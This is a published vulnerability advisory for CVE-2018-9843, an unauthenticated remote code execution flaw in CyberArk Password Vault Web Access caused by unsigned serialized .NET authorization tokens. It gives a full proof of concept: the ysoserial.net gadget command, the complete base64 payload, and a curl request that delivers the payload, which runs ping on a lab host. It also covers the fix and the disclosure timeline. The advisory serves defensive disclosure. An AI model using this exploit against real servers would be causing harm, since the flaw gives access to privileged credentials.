CyberArk Password Vault Web Access Remote Code Execution
The CyberArk Password Vault Web Access application uses authentication tokens which consist of serialized .NET objects. By crafting manipulated tokens, attackers are able to gain unauthenticated remote code execution on the web server.
Details
- Product: CyberArk Password Vault Web Access
- Affected Versions: < 9.9.5, < 9.10.1, 10.1
- Fixed Versions: 9.9.5, 9.10, 10.2
- Vulnerability Type: Remote Code Execution
- Security Risk: high
- Vendor URL:
https://www.cyberark.com/
- Vendor Status: fixed version released
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2017-014
- Advisory Status: published
- CVE: CVE-2018-9843
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843
Introduction
“CyberArk Enterprise Password Vault is designed to secure, rotate and control access to privileged account credentials based on organizational policies. A flexible architecture allows organizations to start small and scale to the largest, most complex IT environments. The solution protects privileged account credentials used to access the vast majority of systems.” (from the Enterprise Password Vault Data Sheet (http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf))
More Details
The CyberArk Password Vault provides secure storage for credentials. It may be accessed through various clients which are also provided by CyberArk. One such client is the CyberArk Password Vault Web Access, a .NET web application. After logging into the web application with their credentials, users may access credentials kept in the vault. Additionally, CyberArk Password Vault Web Access provides a REST API for programmatic access to the vault. This API is available at an URL similar to the following:
https://10.0.0.6/PasswordVault/WebServices/
The API provides multiple endpoints with different methods. Most methods provided by the API require prior authentication. Consequently, a user’s API call must include an authentication token in an HTTP authorization header. Tokens may be generated by calling a dedicated “Logon” API method.
Analysis of this token by RedTeam Pentesting revealed, that it consists of a base64 encoded, serialized .NET object of the type “CyberArk.Services.Web.SessionIdentifiers”. This class consists of four string attributes which hold information about a user’s session. The integrity of the serialized data is not protected. Therefore, attackers may send arbitrary .NET objects to the API in the authorization header. By leveraging certain gadgets, such as the ones provided by ysoserial.net (https://github.com/pwntester/ysoserial.net), attackers may execute arbitrary code in the context of the web application.
Proof of Concept
First, a malicious serialized .NET object is created. Here the “TypeConfuseDelegate” gadget of ysoserial.net is used to execute the “ping” command:
$ ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 \
-c "ping 10.0.0.19" > execute-ping.txt
$ cat execute-ping.txt
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy
ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3Rl
bS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nv
cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwAD
AAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtb
U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0
cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIA
AAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29t
cGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19j
b21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAA
AAIAAAAGBgAAABEvYyBwaW5nIDEwLjAuMC4xOQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxl
Z2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMD
AzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lz
dGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJl
ZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAE
CAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkH
AAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBl
TmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl
cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tT
eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy
YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBt
c2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv
a2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lz
dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49
Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5
c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAA
BVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph
dGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT
aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U
eXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT
dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9z
dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoB
CgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50
MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5J
bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgA
AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg
VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1
YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL
Next, an API call is invoked which includes the malicious .NET object in its authorization header. This is done with cURL (https://curl.haxx.se/) as follows:
$ curl -s -X GET -k \
--url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\
'Applications/?Location=\&IncludeSublocations=true' \
--header "authorization: $(cat execute-ping.txt)" \
--header 'content-type: application/json'
Simultaneously, tcpdump (https://www.tcpdump.org/) is invoked on the host 10.0.0.19 to listen for ICMP packets originating from the web server:
$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]
IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40
IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40
The fact that ICMP packets are received from the web server, indicates that attacker-controlled code was executed.
Workaround
Disable any access to the API at the route /PasswordVault/WebServices.
Fix
Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10.1 or 10.2.
Security Risk
The risk of this vulnerability is rated as high. Attackers with access to the PrivateArk Vault Web Access REST API may execute arbitrary code on the web server. No credentials are required. Attackers gain access to the system with the privileges of the web application. Consequently, such access may be used to backdoor the web application and compromise further accounts and credentials. Additionally, attackers may pivot from the web server to attack the vault directly.
Timeline
- 2017-11-24 Vulnerability identified
- 2018-01-22 Customer approved disclosure to vendor
- 2018-02-05 Vendor notified
- 2018-02-28 Vendor released fixed version
- 2018-04-06 CVE number requested
- 2018-04-07 CVE number assigned
- 2018-04-09 Advisory released
- 2018-04-10 Advisory updated, fixed version number
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/